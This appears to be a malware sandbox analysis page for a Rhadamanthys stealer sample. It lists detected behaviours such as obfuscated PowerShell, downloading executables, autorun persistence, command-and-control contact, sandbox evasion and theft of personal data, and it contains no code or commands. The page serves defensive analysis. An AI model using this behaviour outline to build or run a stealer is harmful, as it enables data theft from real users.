Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Changes powershell execution policy (Unrestricted)

EXPLOIT has been detected (SURICATA)

Starts Visual C# compiler

RHADAMANTHYS has been detected (SURICATA)

Downloads the requested resource (POWERSHELL)

Changes the autorun value in the registry

Stealers network behavior

Actions looks like stealing of personal data

SUSPICIOUS

Probably obfuscated PowerShell command line is found

Starts POWERSHELL.EXE for commands execution

Gets or sets the security protocol (POWERSHELL)

Probably download files using WebClient

Powershell scripting: start process

Block-list domains

Reads security settings of Internet Explorer

Writes data into a file (POWERSHELL)

Process requests binary or script from the Internet

Executable content was dropped or overwritten

Runs shell command (SCRIPT)

Contacting a server suspected of hosting an CnC

The process checks if it is being run in the virtual environment

Connects to unusual port

Potential Corporate Privacy Violation

Loads DLL from Mozilla Firefox

Searches for installed software

INFO

The process uses the downloaded file

Create files in a temporary directory

Reads Internet Explorer settings

Reads the software policy settings

Checks proxy server information

Reads security settings of Internet Explorer

Disables trace logs

Manual execution by a user

Sends debugging messages

The executable file from the user directory is run by the Powershell process

Reads the computer name

Checks supported languages

Reads the machine GUID from the registry

Malware configuration

Static information

TRiD

EXIF

ZIP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules